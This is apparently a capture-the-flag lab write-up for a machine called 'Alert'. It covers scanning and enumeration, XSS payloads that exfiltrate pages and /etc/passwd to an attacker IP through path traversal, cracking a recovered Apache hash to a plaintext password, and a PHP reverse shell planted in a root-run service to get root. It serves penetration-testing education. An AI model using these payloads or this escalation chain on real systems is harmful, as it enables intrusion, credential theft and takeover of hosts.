NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:39
Completed NSE at 13:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:39
Completed NSE at 13:39, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:39
Completed Parallel DNS resolution of 1 host. at 13:39, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 13:39
Scanning 10.10.11.44 [2 ports]
Discovered open port 80/tcp on 10.10.11.44
Discovered open port 22/tcp on 10.10.11.44
Completed SYN Stealth Scan at 13:39, 0.07s elapsed (2 total ports)
NSE: Script scanning 10.10.11.44.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:39
Completed NSE at 13:39, 4.41s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:39
Completed NSE at 13:39, 0.00s elapsed
Nmap scan report for 10.10.11.44
Host is up, received user-set (0.052s latency).
Scanned at 2025-02-24 13:39:31 +00 for 4s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
| ssh-hostkey: 
|   3072 7e:46:2c:46:6e:e6:d1:eb:2d:9d:34:25:e6:36:14:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDSrBVJEKTgtUohrzoK9i67CgzqLAxnhEsPmW8hS5CFFGYikUduAcNkKsmmgQI09Q+6pa+7YHsnxcerBnW0taI//IYB5TI/LSE3yUxyk/ROkKLXPNiNGUhC6QiCj3ZTvThyHrFD9ZTxWfZKEQTcOiPs15+HRPCZepPouRtREGwmJcvDal1ix8p/2/C8X57ekouEEpIk1wzDTG5AM2/D08gXXe0TP+KYEaZEzAKM/mQUAqNTxfjc9x5rlfPYW+50kTDwtyKta57tBkkRCnnns0YRnPNtt0AH374ZkYLcqpzxwN8iTNXaeVT/dGfF4mA1uW89hSMarmiRgRh20Y1KIaInHjv9YcvSlbWz+2sz3ev725d4IExQTvDR4sfUAdysIX/q1iNpleyRgM4cvDMjxD6lEKpvQYSWVlRoJwbUUnJqnmZXboRwzRl+V3XCUaABJrA/1K1gvJfsPcU5LX303CV6LDwvLJIcgXlEbtjhkcxz7b7CS78BEW9hPifCUDGKfUs=
|   256 45:7b:20:95:ec:17:c5:b4:d8:86:50:81:e0:8c:e8:b8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHYLF+puo27gFRX69GBeZJqCeHN3ps2BScsUhKoDV66yEPMOo/Sn588F/wqBnJxsPB3KSFH+kbYW2M6erFI3U5k=
|   256 cb:92:ad:6b:fc:c8:8e:5e:9f:8c:a2:69:1b:6d:d0:f7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG/QUl3gapBOWCGEHplsOKe2NlWjlrb5vTTLjg6gMuGl
80/tcp open  http    syn-ack ttl 63
|_http-title: Did not follow redirect to http://alert.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:39
Completed NSE at 13:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:39
Completed NSE at 13:39, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.76 seconds
           Raw packets sent: 2 (88B) | Rcvd: 2 (88B)

Directories

gobuster dir -u http://alert.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://alert.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 274]
/.htaccess            (Status: 403) [Size: 274]
/.htpasswd            (Status: 403) [Size: 274]
/css                  (Status: 301) [Size: 304] [--> http://alert.htb/css/]
/index.php            (Status: 302) [Size: 660] [--> index.php?page=alert]
/messages             (Status: 301) [Size: 309] [--> http://alert.htb/messages/]
/server-status        (Status: 403) [Size: 274]
/uploads              (Status: 301) [Size: 308] [--> http://alert.htb/uploads/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================


gobuster vhost -u http://alert.htb -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -k --append-domain > vhosts.txt

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://alert.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================

Found: statistics.alert.htb Status: 401 [Size: 467]

Vulnerabilities

XSS

index.php?page=alert - (File Upload Content)
alert.htb/index.php?page=contact - (Message to Admin)

python3 -m http.server 1337   
Serving HTTP on 0.0.0.0 port 1337 (http://0.0.0.0:1337/) ...
10.10.11.44 - - [24/Feb/2025 14:37:28] code 404, message File not found
10.10.11.44 - - [24/Feb/2025 14:37:28] "GET /grabber.php?c=test%27&lt;/script&gt; HTTP/1.1" 404 -

But it says 404 as if it’s trying to get a message file of some sort?

Let's try something different. Based on the fuzzing results, we know that message.php exists, but do we know how to use it? Unfortunately, there’s no clear way to interact with it at the moment. I decided to check the contact form, and I found something interesting: it seems like someone is attempting to locate a file through the content we’re submitting. What if we attempt an XSS attack in the MD Viewer? Since it generates a file, we could try to investigate what happens there and see if we can uncover anything.

<script>
fetch('http://alert.htb/')
  .then(response => response.text())
  .then(data => {
    const lines = data.split('\n');
    lines.forEach(line => {
      fetch('http://10.10.XX.XXX:1337/log?line=' + encodeURIComponent(line));
    });
  });
</script>

After sending the full URL through the contact form, we received an interesting output.

It seems we requested the HTML content from the server’s perspective (which prob has an admin session) and, I guess, we got it. Let’s clean this up and examine it further.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <nav>
        <a href="index.php?page=alert">Markdown Viewer</a>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
        <a href="index.php?page=messages">Messages</a>
    </nav>
    <div class="container">
        <form action="visualizer.php" method="post" enctype="multipart/form-data">
            <h1>Markdown Viewer</h1>
            <div class="form-container">
                <input type="file" name="file" accept=".md" required>
                <input type="submit" value="View Markdown">
            </div>
        </form>
    </div>
    <footer>
        <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    </footer>
</body>
</html>

It seems like we’ve uncovered a new messages page. If we try to access it directly, it’ll appear empty. Let’s go ahead and redo the same process from the server’s point of view to see what we can uncover.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/style.css">
    <title>Alert - Markdown Viewer</title>
</head>
<body>
    <a href="index.php?page=alert">Markdown Viewer</a>
    <nav>
        <a href="index.php?page=contact">Contact Us</a>
        <a href="index.php?page=about">About Us</a>
        <a href="index.php?page=donate">Donate</a>
        <a href="index.php?page=messages">Messages</a>
    </nav>
    <div class="container">
        <h1>Messages</h1>
        <ul>
            <li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li>
        </ul>
    </div>
    <p style="color: black;">© 2024 Alert. All rights reserved.</p>
    <footer></footer>
</body>
</html>

And look at that, it straight leads us to the message.php, using that to craft a new exploit to get the content of /etc/passwd

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../etc/passwd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.XX.XXX:1337/?file_content=" + encodeURIComponent(data));
  });
</script>

And just like that

root:x:0:0:root:/root:/bin/bash
albert:x:1000:1000:albert:/home/albert:/bin/bash
david:x:1001:1002:,,,:/home/david:/bin/bash

Knowing that files like etc are easily accessible, I attempted to access the apache 000-default.conf file to gather more information about the server.

<pre><VirtualHost *:80>
    ServerName alert.htb
    DocumentRoot /var/www/alert.htb
    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb
    DocumentRoot /var/www/statistics.alert.htb
    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

</pre>

/var/www/statistics.alert.htb/.htpasswd seemed particularly interesting, so let's take a closer look at that as well.

And check this out:

albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

Albert’s credentials to access the statistics vhost, lets try cracking that with Hashcat!

echo 'albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/' > hash.txt
hashcat -m 1600 hash.txt /home/kali/htb/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 5 3600X 6-Core Processor, 1435/2934 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /home/kali/htb/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/:manchesterunited    
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1600 (Apache $apr1$ MD5, md5apr1, MD5 (APR))
Hash.Target......: $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
Time.Started.....: Mon Feb 24 15:38:56 2025 (0 secs)
Time.Estimated...: Mon Feb 24 15:38:56 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/home/kali/htb/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     9951 H/s (4.31ms) @ Accel:16 Loops:1000 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2816/14344385 (0.02%)
Rejected.........: 0/2816 (0.00%)
Restore.Point....: 2752/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: bebito -> medicina
Hardware.Mon.#1..: Util: 33%

Started: Mon Feb 24 15:38:41 2025
Stopped: Mon Feb 24 15:38:58 2025

albert:manchesterunited

Last login: Mon Feb 24 15:39:23 2025 from 10.10.16.114
albert@alert:~$ cat user.txt 
cea1ce087e109917cbXXXXXXXXXXXXXX

Ok now we were able to access http://statistics.alert.htb/ as well!

Top 10 Frequent Donors
Rank	Email	Total Donations
1	emily@alert.htb	$839
2	jonathan@alert.htb	$829
3	robert@alert.htb	$819
4	raquel@alert.htb	$809
5	mario@alert.htb	$799
6	amayrani@alert.htb	$789
7	axel@alert.htb	$759
8	sofia@alert.htb	$749
9	john@alert.htb	$739
10	mary@alert.htb	$719
Total Top 10 Donors:	$7850

from which we managed to extract this list of users that can be used for enumeration purposes but I dont think we’d need that since we already know all the users within the system and we now have access to albert!

Root Escalation

albert@alert:~$ whoami
albert
albert@alert:~$ pwd
/home/albert
albert@alert:~$ id
uid=1000(albert) gid=1000(albert) groups=1000(albert),1001(management)
albert@alert:~$ sudo -l
[sudo] password for albert: 
Sorry, user albert may not run sudo on alert.
albert@alert:~$ getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

Checking dirs to which albert can write

**find / -type d -writable -ls 2>/dev/null**

       63      4 drwxrwxrwt   9 root     root         4096 Feb 24 15:51 /var/tmp
     3892      4 drwx-wx-wt   2 root     root         4096 Mar 27  2020 /var/lib/php/sessions
      259      4 drwxrwxrwx   5 www-data www-data     4096 Oct 12 01:42 /var/www/alert.htb
     3676      4 drwxrwxrwx   2 www-data www-data     4096 Feb 24 15:40 /var/www/alert.htb/uploads
     3671      4 drwxrwxrwx   2 www-data www-data     4096 Feb 24 15:33 /var/www/alert.htb/messages
     3598      4 drwxrwxrwx   2 www-data www-data     4096 Oct 12 01:32 /var/www/alert.htb/css
       55      4 drwxrwxrwt   2 root     root         4096 Feb 24 06:25 /var/crash
     8299      4 drwxrwxr-x   2 root     management     4096 Oct 12 04:17 /opt/website-monitor/config
     8297      4 drwxrwxrwx   2 root     root           4096 Feb 24 15:44 /opt/website-monitor/monitors
      658      0 drwxr-xr-x   4 albert   albert            0 Feb 24 15:30 /sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service
      668      0 drwxr-xr-x   2 albert   albert            0 Feb 24 15:30 /sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service/dbus.socket
      663      0 drwxr-xr-x   2 albert   albert            0 Feb 24 15:30 /sys/fs/cgroup/systemd/user.slice/user-1000.slice/user@1000.service/init.scope
     1966      0 drwxr-xr-x   4 albert   albert            0 Feb 24 15:30 /sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service
     1996      0 drwxr-xr-x   2 albert   albert            0 Feb 24 15:30 /sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service/dbus.socket
     1981      0 drwxr-xr-x   2 albert   albert            0 Feb 24 15:30 /sys/fs/cgroup/unified/user.slice/user-1000.slice/user@1000.service/init.scope
   304925      0 dr-x------   2 albert   albert            0 Feb 24 15:52 /proc/22076/task/22076/fd
   304873      0 dr-x------   2 albert   albert            0 Feb 24 15:52 /proc/22076/fd
   304874      0 dr-x------   2 albert   albert            0 Feb 24 15:52 /proc/22076/map_files
        2      0 drwx------   5 albert   albert          140 Feb 24 15:30 /run/user/1000
       16      0 drwx------   2 albert   albert          140 Feb 24 15:30 /run/user/1000/gnupg
       10      0 drwxr-xr-x   3 albert   albert          100 Feb 24 15:30 /run/user/1000/systemd
       11      0 drwxr-xr-x   2 albert   albert           60 Feb 24 15:30 /run/user/1000/systemd/units
      689      0 drwxrwxrwt   2 root     utmp             40 Feb 24 04:01 /run/screen
        2      0 drwxrwxrwt   5 root     root            100 Feb 24 04:01 /run/lock
       21      4 drwxrwxrwt  15 root     root           4096 Feb 24 15:51 /tmp
      229      4 drwxrwxrwt   2 root     root           4096 Feb 24 04:01 /tmp/.ICE-unix
      240      4 drwxrwxrwt   2 root     root           4096 Feb 24 04:01 /tmp/.Test-unix
      233      4 drwxrwxrwt   2 root     root           4096 Feb 24 04:01 /tmp/.XIM-unix
      238      4 drwxrwxrwt   2 root     root           4096 Feb 24 04:01 /tmp/.font-unix
      226      4 drwxrwxrwt   2 root     root           4096 Feb 24 04:01 /tmp/.X11-unix
    15865      0 drwxrwxrwt   2 root     root             40 Feb 24 04:00 /dev/mqueue
        2      0 drwxrwxrwt   2 root     root             40 Feb 24 15:33 /dev/shm
   276947      4 drwxr-x---   3 albert   albert         4096 Nov 19 14:19 /home/albert
   276960      4 drwx------   2 albert   albert         4096 Mar  8  2024 /home/albert/.cache

/opt/website-monitor/ definitely stood out among the paths. Upon checking it I found that it’s a PHP web app used to monitor websites.

The README and the conf file indeed confirm the monitoring our both vhost

**netstat -tulpn**
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -

**ss -tulpn**
Netid           State            Recv-Q           Send-Q                       Local Address:Port                       Peer Address:Port           Process           
udp             UNCONN           0                0                            127.0.0.53%lo:53                              0.0.0.0:*                                
udp             UNCONN           0                0                                  0.0.0.0:68                              0.0.0.0:*                                
tcp             LISTEN           0                4096                             127.0.0.1:8080                            0.0.0.0:*                                
tcp             LISTEN           0                4096                         127.0.0.53%lo:53                              0.0.0.0:*                                
tcp             LISTEN           0                128                                0.0.0.0:22                              0.0.0.0:*                                
tcp             LISTEN           0                511                                      *:80                                    *:*                                
tcp             LISTEN           0                128                                   [::]:22                                 [::]:*

In both commands, processes were hidden because we’re logged in as albert. Typically, it hides details about processes you don’t own. However, since we know the app is PHP and the server is running Apache2, we can filter the ps aux output to snoop around

**ps aux | grep -i "php\|httpd\|apache\|nginx"**
root        1012  0.0  0.6 207256 26556 ?        Ss   04:01   0:01 /usr/bin/php -S 127.0.0.1:8080 -t /opt/website-monitor
root        1038  0.0  0.0   2608   536 ?        Ss   04:01   0:00 /bin/sh -c /root/scripts/php_bot.sh
root        1040  0.0  0.0   6892  3240 ?        S    04:01   0:00 /bin/bash /root/scripts/php_bot.sh
root        1043  0.0  0.0   6892   224 ?        S    04:01   0:00 /bin/bash /root/scripts/php_bot.sh
root        1063  0.0  0.6 207124 24028 ?        Ss   04:01   0:02 /usr/sbin/apache2 -k start
www-data   22190  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22191  0.0  0.3 207544 15664 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22192  0.0  0.3 207544 15664 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22193  0.0  0.3 207544 15728 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22194  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22195  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22196  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22197  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22198  0.0  0.0      0     0 ?        Z    16:02   0:00 [apache2] <defunct>
www-data   22199  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22200  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22202  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22203  0.0  0.3 207544 15684 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22208  0.0  0.3 207544 15688 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22213  0.0  0.3 207544 15688 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22216  0.0  0.3 207544 15688 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22226  0.0  0.2 207600 10200 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22227  0.0  0.2 207584 10200 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22228  0.0  0.2 207584 10200 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22229  0.0  0.2 207584 10200 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22230  0.0  0.2 207584 10200 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
www-data   22233  0.0  0.2 207600 10200 ?        S    16:02   0:00 /usr/sbin/apache2 -k start
albert     22266  0.0  0.0   6440  2664 pts/2    R+   16:03   0:00 grep --color=auto -i php\|httpd\|apache\|nginx

Voila! We confirmed that indeed opt/website-monitor should be accessible from the 127.0.0.1:8080, so we can just port forward on our SSH!

ssh -L 8081:localhost:8080 albert@alert.htb

Routed it to 8081 on my local machine since 8080 was taken by Caido. So by doing so we can access it now

Hmm nothing too interesting, but remember this process is being run by root as seen in the ps aux response. Luckily for us albert has write access to /config and /monitor, so a simple PHP reverse shell should do the trick!

Dropped it on /opt/website-monitor/config/w.php

Opened the port 1337, and got root

c -lvp 1337
listening on [any] 1337 ...
connect to [10.10.XX.XXX] from alert.htb [10.10.11.44] 52746
Linux alert 5.4.0-200-generic #220-Ubuntu SMP Fri Sep 27 13:19:16 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 16:14:09 up 12:13,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
albert   pts/0    10.10.XX.XXX     16:08    9.00s  0.05s  0.05s -bash
albert   pts/1    10.10.16.114     15:39   29:05   0.08s  0.08s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# cat /root/root.txt
ae953817d68fe5c2d0a7d4XXXXXXXXXX